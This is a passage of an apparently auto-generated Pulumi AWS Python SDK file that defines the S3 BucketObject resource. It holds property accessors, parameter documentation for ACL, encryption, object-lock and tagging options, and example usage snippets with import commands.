hold](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-legal-holds) status that you want to apply to the specified object. Valid values are `ON` and `OFF`.\n :param pulumi.Input[str] object_lock_mode: Object lock [retention mode](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-modes) that you want to apply to this object. 
Valid values are `GOVERNANCE` and `COMPLIANCE`.\n :param pulumi.Input[str] object_lock_retain_until_date: Date and time, in [RFC3339 format](https://tools.ietf.org/html/rfc3339#section-5.8), when this object's object lock will [expire](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-periods).\n :param pulumi.Input[str] server_side_encryption: Server-side encryption of the object in S3. Valid values are \"`AES256`\" and \"`aws:kms`\".\n :param pulumi.Input[Union[pulumi.Asset, pulumi.Archive]] source: Path to a file that will be read and uploaded as raw bytes for the object content.\n :param pulumi.Input[str] source_hash: Triggers updates like `etag` but useful to address `etag` encryption limitations. Set using `filemd5(\"path/to/source\")`. (The value is only stored in state and not saved by AWS.)\n :param pulumi.Input[str] storage_class: [Storage Class](https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutObject.html#AmazonS3-PutObject-request-header-StorageClass) for the object. Defaults to \"`STANDARD`\".\n :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Map of tags to assign to the object. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.\n :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: Map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.\n :param pulumi.Input[str] version_id: Unique version ID value for the object, if bucket versioning is enabled.\n :param pulumi.Input[str] website_redirect: Target URL for [website redirect](http://docs.aws.amazon.com/AmazonS3/latest/dev/how-to-page-redirect.html).\n \"\"\"\n if acl is not None:\n pulumi.set(__self__, \"acl\", acl)\n if bucket is not None:\n warnings.warn(\"\"\"Use the aws_s3_object resource instead\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"bucket is deprecated: Use the aws_s3_object resource instead\"\"\")\n if bucket is not None:\n pulumi.set(__self__, \"bucket\", bucket)\n if bucket_key_enabled is not None:\n pulumi.set(__self__, \"bucket_key_enabled\", bucket_key_enabled)\n if cache_control is not None:\n pulumi.set(__self__, \"cache_control\", cache_control)\n if content is not None:\n pulumi.set(__self__, \"content\", content)\n if content_base64 is not None:\n pulumi.set(__self__, \"content_base64\", content_base64)\n if content_disposition is not None:\n pulumi.set(__self__, \"content_disposition\", content_disposition)\n if content_encoding is not None:\n pulumi.set(__self__, \"content_encoding\", content_encoding)\n if content_language is not None:\n pulumi.set(__self__, \"content_language\", content_language)\n if content_type is not None:\n pulumi.set(__self__, \"content_type\", content_type)\n if etag is not None:\n pulumi.set(__self__, \"etag\", etag)\n if force_destroy is not None:\n pulumi.set(__self__, \"force_destroy\", force_destroy)\n if key is not None:\n warnings.warn(\"\"\"Use the aws_s3_object resource instead\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"key is deprecated: Use the aws_s3_object resource instead\"\"\")\n if key is not None:\n pulumi.set(__self__, \"key\", key)\n if kms_key_id is not None:\n pulumi.set(__self__, \"kms_key_id\", kms_key_id)\n if metadata is not None:\n pulumi.set(__self__, \"metadata\", metadata)\n if object_lock_legal_hold_status is not None:\n pulumi.set(__self__, \"object_lock_legal_hold_status\", 
object_lock_legal_hold_status)\n if object_lock_mode is not None:\n pulumi.set(__self__, \"object_lock_mode\", object_lock_mode)\n if object_lock_retain_until_date is not None:\n pulumi.set(__self__, \"object_lock_retain_until_date\", object_lock_retain_until_date)\n if server_side_encryption is not None:\n pulumi.set(__self__, \"server_side_encryption\", server_side_encryption)\n if source is not None:\n pulumi.set(__self__, \"source\", source)\n if source_hash is not None:\n pulumi.set(__self__, \"source_hash\", source_hash)\n if storage_class is not None:\n pulumi.set(__self__, \"storage_class\", storage_class)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tags_all is not None:\n pulumi.set(__self__, \"tags_all\", tags_all)\n if version_id is not None:\n pulumi.set(__self__, \"version_id\", version_id)\n if website_redirect is not None:\n pulumi.set(__self__, \"website_redirect\", website_redirect)\n\n @property\n @pulumi.getter\n def acl(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n [Canned ACL](https://docs.aws.amazon.com/AmazonS3/latest/dev/acl-overview.html#canned-acl) to apply. Valid values are `private`, `public-read`, `public-read-write`, `aws-exec-read`, `authenticated-read`, `bucket-owner-read`, and `bucket-owner-full-control`. Defaults to `private`.\n \"\"\"\n return pulumi.get(self, \"acl\")\n\n @acl.setter\n def acl(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"acl\", value)\n\n @property\n @pulumi.getter\n def bucket(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Name of the bucket to put the file in. Alternatively, an [S3 access point](https://docs.aws.amazon.com/AmazonS3/latest/dev/using-access-points.html) ARN can be specified.\n \"\"\"\n return pulumi.get(self, \"bucket\")\n\n @bucket.setter\n def bucket(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"bucket\", value)\n\n @property\n @pulumi.getter(name=\"bucketKeyEnabled\")\n def bucket_key_enabled(self) -> Optional[pulumi.Input[bool]]:\n \"\"\"\n Whether or not to use [Amazon S3 Bucket Keys](https://docs.aws.amazon.com/AmazonS3/latest/dev/bucket-key.html) for SSE-KMS.\n \"\"\"\n return pulumi.get(self, \"bucket_key_enabled\")\n\n @bucket_key_enabled.setter\n def bucket_key_enabled(self, value: Optional[pulumi.Input[bool]]):\n pulumi.set(self, \"bucket_key_enabled\", value)\n\n @property\n @pulumi.getter(name=\"cacheControl\")\n def cache_control(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Caching behavior along the request/reply chain Read [w3c cache_control](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9) for further details.\n \"\"\"\n return pulumi.get(self, \"cache_control\")\n\n @cache_control.setter\n def cache_control(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"cache_control\", value)\n\n @property\n @pulumi.getter\n def content(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Literal string value to use as the object content, which will be uploaded as UTF-8-encoded text.\n \"\"\"\n return pulumi.get(self, \"content\")\n\n @content.setter\n def content(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"content\", value)\n\n @property\n @pulumi.getter(name=\"contentBase64\")\n def content_base64(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Base64-encoded data that will be decoded and uploaded as raw bytes for the object content. This allows safely uploading non-UTF8 binary data, but is recommended only for small content such as the result of the `gzipbase64` function with small text strings. 
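A short sketch of the `content_base64` path just described (bucket and key names here are placeholders, not values from the provider documentation):

```python
import base64
import pulumi_aws as aws

# Inline a small binary payload; for anything larger prefer `source=pulumi.FileAsset(...)`.
favicon = aws.s3.BucketObject("favicon",
    bucket="some-bucket-name",  # placeholder bucket name
    key="favicon.ico",
    content_base64=base64.b64encode(b"\x00\x01\x02\x03").decode("ascii"),
    content_type="image/x-icon")
```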
For larger objects, use `source` to stream the content from a disk file.\n \"\"\"\n return pulumi.get(self, \"content_base64\")\n\n @content_base64.setter\n def content_base64(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"content_base64\", value)\n\n @property\n @pulumi.getter(name=\"contentDisposition\")\n def content_disposition(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Presentational information for the object. Read [w3c content_disposition](http://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html#sec19.5.1) for further information.\n \"\"\"\n return pulumi.get(self, \"content_disposition\")\n\n @content_disposition.setter\n def content_disposition(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"content_disposition\", value)\n\n @property\n @pulumi.getter(name=\"contentEncoding\")\n def content_encoding(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Content encodings that have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [w3c content encoding](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.11) for further information.\n \"\"\"\n return pulumi.get(self, \"content_encoding\")\n\n @content_encoding.setter\n def content_encoding(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"content_encoding\", value)\n\n @property\n @pulumi.getter(name=\"contentLanguage\")\n def content_language(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Language the content is in e.g., en-US or en-GB.\n \"\"\"\n return pulumi.get(self, \"content_language\")\n\n @content_language.setter\n def content_language(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"content_language\", value)\n\n @property\n @pulumi.getter(name=\"contentType\")\n def content_type(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Standard MIME type describing the format of the object data, e.g., application/octet-stream. All Valid MIME Types are valid for this input.\n \"\"\"\n return pulumi.get(self, \"content_type\")\n\n @content_type.setter\n def content_type(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"content_type\", value)\n\n @property\n @pulumi.getter\n def etag(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Triggers updates when the value changes. The only meaningful value is `filemd5(\"path/to/file\")`. This attribute is not compatible with KMS encryption, `kms_key_id` or `server_side_encryption = \"aws:kms\"` (see `source_hash` instead).\n \"\"\"\n return pulumi.get(self, \"etag\")\n\n @etag.setter\n def etag(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"etag\", value)\n\n @property\n @pulumi.getter(name=\"forceDestroy\")\n def force_destroy(self) -> Optional[pulumi.Input[bool]]:\n \"\"\"\n Whether to allow the object to be deleted by removing any legal hold on any object version. Default is `false`. 
This value should be set to `true` only if the bucket has S3 object lock enabled.\n \"\"\"\n return pulumi.get(self, \"force_destroy\")\n\n @force_destroy.setter\n def force_destroy(self, value: Optional[pulumi.Input[bool]]):\n pulumi.set(self, \"force_destroy\", value)\n\n @property\n @pulumi.getter\n def key(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Name of the object once it is in the bucket.\n \"\"\"\n return pulumi.get(self, \"key\")\n\n @key.setter\n def key(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"key\", value)\n\n @property\n @pulumi.getter(name=\"kmsKeyId\")\n def kms_key_id(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n ARN of the KMS Key to use for object encryption. If the S3 Bucket has server-side encryption enabled, that value will automatically be used. If referencing the `kms.Key` resource, use the `arn` attribute. If referencing the `kms.Alias` data source or resource, use the `target_key_arn` attribute. This provider will only perform drift detection if a configuration value is provided.\n \"\"\"\n return pulumi.get(self, \"kms_key_id\")\n\n @kms_key_id.setter\n def kms_key_id(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"kms_key_id\", value)\n\n @property\n @pulumi.getter\n def metadata(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n \"\"\"\n Map of keys/values to provision metadata (will be automatically prefixed by `x-amz-meta-`, note that only lowercase label are currently supported by the AWS Go API).\n \"\"\"\n return pulumi.get(self, \"metadata\")\n\n @metadata.setter\n def metadata(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):\n pulumi.set(self, \"metadata\", value)\n\n @property\n @pulumi.getter(name=\"objectLockLegalHoldStatus\")\n def object_lock_legal_hold_status(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n [Legal hold](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-legal-holds) status that you want to apply to the specified object. Valid values are `ON` and `OFF`.\n \"\"\"\n return pulumi.get(self, \"object_lock_legal_hold_status\")\n\n @object_lock_legal_hold_status.setter\n def object_lock_legal_hold_status(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"object_lock_legal_hold_status\", value)\n\n @property\n @pulumi.getter(name=\"objectLockMode\")\n def object_lock_mode(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Object lock [retention mode](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-modes) that you want to apply to this object. 
Valid values are `GOVERNANCE` and `COMPLIANCE`.\n \"\"\"\n return pulumi.get(self, \"object_lock_mode\")\n\n @object_lock_mode.setter\n def object_lock_mode(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"object_lock_mode\", value)\n\n @property\n @pulumi.getter(name=\"objectLockRetainUntilDate\")\n def object_lock_retain_until_date(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Date and time, in [RFC3339 format](https://tools.ietf.org/html/rfc3339#section-5.8), when this object's object lock will [expire](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-periods).\n \"\"\"\n return pulumi.get(self, \"object_lock_retain_until_date\")\n\n @object_lock_retain_until_date.setter\n def object_lock_retain_until_date(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"object_lock_retain_until_date\", value)\n\n @property\n @pulumi.getter(name=\"serverSideEncryption\")\n def server_side_encryption(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Server-side encryption of the object in S3. Valid values are \"`AES256`\" and \"`aws:kms`\".\n \"\"\"\n return pulumi.get(self, \"server_side_encryption\")\n\n @server_side_encryption.setter\n def server_side_encryption(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"server_side_encryption\", value)\n\n @property\n @pulumi.getter\n def source(self) -> Optional[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]]:\n \"\"\"\n Path to a file that will be read and uploaded as raw bytes for the object content.\n \"\"\"\n return pulumi.get(self, \"source\")\n\n @source.setter\n def source(self, value: Optional[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]]):\n pulumi.set(self, \"source\", value)\n\n @property\n @pulumi.getter(name=\"sourceHash\")\n def source_hash(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Triggers updates like `etag` but useful to address `etag` encryption limitations. Set using `filemd5(\"path/to/source\")`. (The value is only stored in state and not saved by AWS.)\n \"\"\"\n return pulumi.get(self, \"source_hash\")\n\n @source_hash.setter\n def source_hash(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"source_hash\", value)\n\n @property\n @pulumi.getter(name=\"storageClass\")\n def storage_class(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n [Storage Class](https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutObject.html#AmazonS3-PutObject-request-header-StorageClass) for the object. Defaults to \"`STANDARD`\".\n \"\"\"\n return pulumi.get(self, \"storage_class\")\n\n @storage_class.setter\n def storage_class(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"storage_class\", value)\n\n @property\n @pulumi.getter\n def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n \"\"\"\n Map of tags to assign to the object. 
If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.\n \"\"\"\n return pulumi.get(self, \"tags\")\n\n @tags.setter\n def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):\n pulumi.set(self, \"tags\", value)\n\n @property\n @pulumi.getter(name=\"tagsAll\")\n def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n \"\"\"\n Map of tags assigned to the resource, including those inherited from the provider `default_tags` configuration block.\n \"\"\"\n return pulumi.get(self, \"tags_all\")\n\n @tags_all.setter\n def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):\n pulumi.set(self, \"tags_all\", value)\n\n @property\n @pulumi.getter(name=\"versionId\")\n def version_id(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Unique version ID value for the object, if bucket versioning is enabled.\n \"\"\"\n return pulumi.get(self, \"version_id\")\n\n @version_id.setter\n def version_id(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"version_id\", value)\n\n @property\n @pulumi.getter(name=\"websiteRedirect\")\n def website_redirect(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Target URL for [website redirect](http://docs.aws.amazon.com/AmazonS3/latest/dev/how-to-page-redirect.html).\n \"\"\"\n return pulumi.get(self, \"website_redirect\")\n\n @website_redirect.setter\n def website_redirect(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"website_redirect\", value)\n\n\nclass BucketObject(pulumi.CustomResource):\n @overload\n def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n acl: Optional[pulumi.Input[str]] = None,\n bucket: Optional[pulumi.Input[str]] = None,\n bucket_key_enabled: Optional[pulumi.Input[bool]] = None,\n cache_control: Optional[pulumi.Input[str]] = None,\n content: Optional[pulumi.Input[str]] = None,\n content_base64: Optional[pulumi.Input[str]] = None,\n content_disposition: Optional[pulumi.Input[str]] = None,\n content_encoding: Optional[pulumi.Input[str]] = None,\n content_language: Optional[pulumi.Input[str]] = None,\n content_type: Optional[pulumi.Input[str]] = None,\n etag: Optional[pulumi.Input[str]] = None,\n force_destroy: Optional[pulumi.Input[bool]] = None,\n key: Optional[pulumi.Input[str]] = None,\n kms_key_id: Optional[pulumi.Input[str]] = None,\n metadata: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n object_lock_legal_hold_status: Optional[pulumi.Input[str]] = None,\n object_lock_mode: Optional[pulumi.Input[str]] = None,\n object_lock_retain_until_date: Optional[pulumi.Input[str]] = None,\n server_side_encryption: Optional[pulumi.Input[str]] = None,\n source: Optional[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]] = None,\n source_hash: Optional[pulumi.Input[str]] = None,\n storage_class: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n website_redirect: Optional[pulumi.Input[str]] = None,\n __props__=None):\n \"\"\"\n ## Example Usage\n ### Encrypting with KMS Key\n\n ```python\n import pulumi\n import pulumi_aws as aws\n\n examplekms = aws.kms.Key(\"examplekms\",\n description=\"KMS key 1\",\n deletion_window_in_days=7)\n examplebucket = aws.s3.BucketV2(\"examplebucket\")\n example_bucket_acl_v2 = aws.s3.BucketAclV2(\"exampleBucketAclV2\",\n bucket=examplebucket.id,\n acl=\"private\")\n example_bucket_object = 
aws.s3.BucketObject(\"exampleBucketObject\",\n key=\"someobject\",\n bucket=examplebucket.id,\n source=pulumi.FileAsset(\"index.html\"),\n kms_key_id=examplekms.arn)\n ```\n ### Server Side Encryption with S3 Default Master Key\n\n ```python\n import pulumi\n import pulumi_aws as aws\n\n examplebucket = aws.s3.BucketV2(\"examplebucket\")\n example_bucket_acl_v2 = aws.s3.BucketAclV2(\"exampleBucketAclV2\",\n bucket=examplebucket.id,\n acl=\"private\")\n example_bucket_object = aws.s3.BucketObject(\"exampleBucketObject\",\n key=\"someobject\",\n bucket=examplebucket.id,\n source=pulumi.FileAsset(\"index.html\"),\n server_side_encryption=\"aws:kms\")\n ```\n ### Server Side Encryption with AWS-Managed Key\n\n ```python\n import pulumi\n import pulumi_aws as aws\n\n examplebucket = aws.s3.BucketV2(\"examplebucket\")\n example_bucket_acl_v2 = aws.s3.BucketAclV2(\"exampleBucketAclV2\",\n bucket=examplebucket.id,\n acl=\"private\")\n example_bucket_object = aws.s3.BucketObject(\"exampleBucketObject\",\n key=\"someobject\",\n bucket=examplebucket.id,\n source=pulumi.FileAsset(\"index.html\"),\n server_side_encryption=\"AES256\")\n ```\n ### S3 Object Lock\n\n ```python\n import pulumi\n import pulumi_aws as aws\n\n examplebucket = aws.s3.BucketV2(\"examplebucket\", object_lock_configuration=aws.s3.BucketV2ObjectLockConfigurationArgs(\n object_lock_enabled=\"Enabled\",\n ))\n example_bucket_acl_v2 = aws.s3.BucketAclV2(\"exampleBucketAclV2\",\n bucket=examplebucket.id,\n acl=\"private\")\n example_bucket_versioning_v2 = aws.s3.BucketVersioningV2(\"exampleBucketVersioningV2\",\n bucket=examplebucket.id,\n versioning_configuration=aws.s3.BucketVersioningV2VersioningConfigurationArgs(\n status=\"Enabled\",\n ))\n example_bucket_object = aws.s3.BucketObject(\"exampleBucketObject\",\n key=\"someobject\",\n bucket=examplebucket.id,\n source=pulumi.FileAsset(\"important.txt\"),\n object_lock_legal_hold_status=\"ON\",\n object_lock_mode=\"GOVERNANCE\",\n object_lock_retain_until_date=\"2021-12-31T23:59:60Z\",\n force_destroy=True,\n opts=pulumi.ResourceOptions(depends_on=[example_bucket_versioning_v2]))\n ```\n\n ## Import\n\n Objects can be imported using the `id`. The `id` is the bucket name and the key together e.g.,\n\n ```sh\n $ pulumi import aws:s3/bucketObject:BucketObject object some-bucket-name/some/key.txt\n ```\n\n Additionally, s3 url syntax can be used, e.g.,\n\n ```sh\n $ pulumi import aws:s3/bucketObject:BucketObject object s3://some-bucket-name/some/key.txt\n ```\n\n :param str resource_name: The name of the resource.\n :param pulumi.ResourceOptions opts: Options for the resource.\n :param pulumi.Input[str] acl: [Canned ACL](https://docs.aws.amazon.com/AmazonS3/latest/dev/acl-overview.html#canned-acl) to apply. Valid values are `private`, `public-read`, `public-read-write`, `aws-exec-read`, `authenticated-read`, `bucket-owner-read`, and `bucket-owner-full-control`. Defaults to `private`.\n :param pulumi.Input[str] bucket: Name of the bucket to put the file in. 
Alternatively, an [S3 access point](https://docs.aws.amazon.com/AmazonS3/latest/dev/using-access-points.html) ARN can be specified.\n :param pulumi.Input[bool] bucket_key_enabled: Whether or not to use [Amazon S3 Bucket Keys](https://docs.aws.amazon.com/AmazonS3/latest/dev/bucket-key.html) for SSE-KMS.\n :param pulumi.Input[str] cache_control: Caching behavior along the request/reply chain Read [w3c cache_control](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9) for further details.\n :param pulumi.Input[str] content: Literal string value to use as the object content, which will be uploaded as UTF-8-encoded text.\n :param pulumi.Input[str] content_base64: Base64-encoded data that will be decoded and uploaded as raw bytes for the object content. This allows safely uploading non-UTF8 binary data, but is recommended only for small content such as the result of the `gzipbase64` function with small text strings. For larger objects, use `source` to stream the content from a disk file.\n :param pulumi.Input[str] content_disposition: Presentational information for the object. Read [w3c content_disposition](http://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html#sec19.5.1) for further information.\n :param pulumi.Input[str] content_encoding: Content encodings that have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [w3c content encoding](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.11) for further information.\n :param pulumi.Input[str] content_language: Language the content is in e.g., en-US or en-GB.\n :param pulumi.Input[str] content_type: Standard MIME type describing the format of the object data, e.g., application/octet-stream. All Valid MIME Types are valid for this input.\n :param pulumi.Input[str] etag: Triggers updates when the value changes. The only meaningful value is `filemd5(\"path/to/file\")`. This attribute is not compatible with KMS encryption, `kms_key_id` or `server_side_encryption = \"aws:kms\"` (see `source_hash` instead).\n :param pulumi.Input[bool] force_destroy: Whether to allow the object to be deleted by removing any legal hold on any object version. Default is `false`. This value should be set to `true` only if the bucket has S3 object lock enabled.\n :param pulumi.Input[str] key: Name of the object once it is in the bucket.\n :param pulumi.Input[str] kms_key_id: ARN of the KMS Key to use for object encryption. If the S3 Bucket has server-side encryption enabled, that value will automatically be used. If referencing the `kms.Key` resource, use the `arn` attribute. If referencing the `kms.Alias` data source or resource, use the `target_key_arn` attribute. This provider will only perform drift detection if a configuration value is provided.\n :param pulumi.Input[Mapping[str, pulumi.Input[str]]] metadata: Map of keys/values to provision metadata (will be automatically prefixed by `x-amz-meta-`, note that only lowercase label are currently supported by the AWS Go API).\n :param pulumi.Input[str] object_lock_legal_hold_status: [Legal hold](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-legal-holds) status that you want to apply to the specified object. Valid values are `ON` and `OFF`.\n :param pulumi.Input[str] object_lock_mode: Object lock [retention mode](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-modes) that you want to apply to this object. 
Valid values are `GOVERNANCE` and `COMPLIANCE`.\n :param pulumi.Input[str] object_lock_retain_until_date: Date and time, in [RFC3339 format](https://tools.ietf.org/html/rfc3339#section-5.8), when this object's object lock will [expire](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-periods).\n :param pulumi.Input[str] server_side_encryption: Server-side encryption of the object in S3. Valid values are \"`AES256`\" and \"`aws:kms`\".\n :param pulumi.Input[Union[pulumi.Asset, pulumi.Archive]] source: Path to a file that will be read and uploaded as raw bytes for the object content.\n :param pulumi.Input[str] source_hash: Triggers updates like `etag` but useful to address `etag` encryption limitations. Set using `filemd5(\"path/to/source\")`. (The value is only stored in state and not saved by AWS.)\n :param pulumi.Input[str] storage_class: [Storage Class](https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutObject.html#AmazonS3-PutObject-request-header-StorageClass) for the object. Defaults to \"`STANDARD`\".\n :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Map of tags to assign to the object. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.\n :param pulumi.Input[str] website_redirect: Target URL for [website redirect](http://docs.aws.amazon.com/AmazonS3/latest/dev/how-to-page-redirect.html).\n \"\"\"\n ...\n @overload\n def __init__(__self__,\n resource_name: str,\n args: BucketObjectArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n \"\"\"\n ## Example Usage\n ### Encrypting with KMS Key\n\n ```python\n import pulumi\n import pulumi_aws as aws\n\n examplekms = aws.kms.Key(\"examplekms\",\n description=\"KMS key 1\",\n deletion_window_in_days=7)\n examplebucket = aws.s3.BucketV2(\"examplebucket\")\n example_bucket_acl_v2 = aws.s3.BucketAclV2(\"exampleBucketAclV2\",\n bucket=examplebucket.id,\n acl=\"private\")\n example_bucket_object = aws.s3.BucketObject(\"exampleBucketObject\",\n key=\"someobject\",\n bucket=examplebucket.id,\n source=pulumi.FileAsset(\"index.html\"),\n kms_key_id=examplekms.arn)\n ```\n ### Server Side Encryption with S3 Default Master Key\n\n ```python\n import pulumi\n import pulumi_aws as aws\n\n examplebucket = aws.s3.BucketV2(\"examplebucket\")\n example_bucket_acl_v2 = aws.s3.BucketAclV2(\"exampleBucketAclV2\",\n bucket=examplebucket.id,\n acl=\"private\")\n example_bucket_object = aws.s3.BucketObject(\"exampleBucketObject\",\n key=\"someobject\",\n bucket=examplebucket.id,\n source=pulumi.FileAsset(\"index.html\"),\n server_side_encryption=\"aws:kms\")\n ```\n ### Server Side Encryption with AWS-Managed Key\n\n ```python\n import pulumi\n import pulumi_aws as aws\n\n examplebucket = aws.s3.BucketV2(\"examplebucket\")\n example_bucket_acl_v2 = aws.s3.BucketAclV2(\"exampleBucketAclV2\",\n bucket=examplebucket.id,\n acl=\"private\")\n example_bucket_object = aws.s3.BucketObject(\"exampleBucketObject\",\n key=\"someobject\",\n bucket=examplebucket.id,\n source=pulumi.FileAsset(\"index.html\"),\n server_side_encryption=\"AES256\")\n ```\n ### S3 Object Lock\n\n ```python\n import pulumi\n import pulumi_aws as aws\n\n examplebucket = aws.s3.BucketV2(\"examplebucket\", object_lock_configuration=aws.s3.BucketV2ObjectLockConfigurationArgs(\n object_lock_enabled=\"Enabled\",\n ))\n example_bucket_acl_v2 = aws.s3.BucketAclV2(\"exampleBucketAclV2\",\n bucket=examplebucket.id,\n acl=\"private\")\n 
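# Object Lock requires versioning to be enabled on the bucket, which is why the\n        # BucketVersioningV2 resource below is created and referenced via depends_on.\n        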
example_bucket_versioning_v2 = aws.s3.BucketVersioningV2(\"exampleBucketVersioningV2\",\n bucket=examplebucket.id,\n versioning_configuration=aws.s3.BucketVersioningV2VersioningConfigurationArgs(\n status=\"Enabled\",\n ))\n example_bucket_object = aws.s3.BucketObject(\"exampleBucketObject\",\n key=\"someobject\",\n bucket=examplebucket.id,\n source=pulumi.FileAsset(\"important.txt\"),\n object_lock_legal_hold_status=\"ON\",\n object_lock_mode=\"GOVERNANCE\",\n object_lock_retain_until_date=\"2021-12-31T23:59:60Z\",\n force_destroy=True,\n opts=pulumi.ResourceOptions(depends_on=[example_bucket_versioning_v2]))\n ```\n\n ## Import\n\n Objects can be imported using the `id`. The `id` is the bucket name and the key together e.g.,\n\n ```sh\n $ pulumi import aws:s3/bucketObject:BucketObject object some-bucket-name/some/key.txt\n ```\n\n Additionally, s3 url syntax can be used, e.g.,\n\n ```sh\n $ pulumi import aws:s3/bucketObject:BucketObject object s3://some-bucket-name/some/key.txt\n ```\n\n :param str resource_name: The name of the resource.\n :param BucketObjectArgs args: The arguments to use to populate this resource's properties.\n :param pulumi.ResourceOptions opts: Options for the resource.\n \"\"\"\n ...\n def __init__(__self__, resource_name: str, *args, **kwargs):\n resource_args, opts = _utilities.get_resource_args_opts(BucketObjectArgs, pulumi.ResourceOptions, *args, **kwargs)\n if resource_args is not None:\n __self__._internal_init(resource_name, opts, **resource_args.__dict__)\n else:\n __self__._internal_init(resource_name, *args, **kwargs)\n\n def _internal_init(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n acl: Optional[pulumi.Input[str]] = None,\n bucket: Optional[pulumi.Input[str]] = None,\n bucket_key_enabled: Optional[pulumi.Input[bool]] = None,\n cache_control: Optional[pulumi.Input[str]] = None,\n content: Optional[pulumi.Input[str]] = None,\n content_base64: Optional[pulumi.Input[str]] = None,\n content_disposition: Optional[pulumi.Input[str]] = None,\n content_encoding: Optional[pulumi.Input[str]] = None,\n content_language: Optional[pulumi.Input[str]] = None,\n content_type: Optional[pulumi.Input[str]] = None,\n etag: Optional[pulumi.Input[str]] = None,\n force_destroy: Optional[pulumi.Input[bool]] = None,\n key: Optional[pulumi.Input[str]] = None,\n kms_key_id: Optional[pulumi.Input[str]] = None,\n metadata: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] 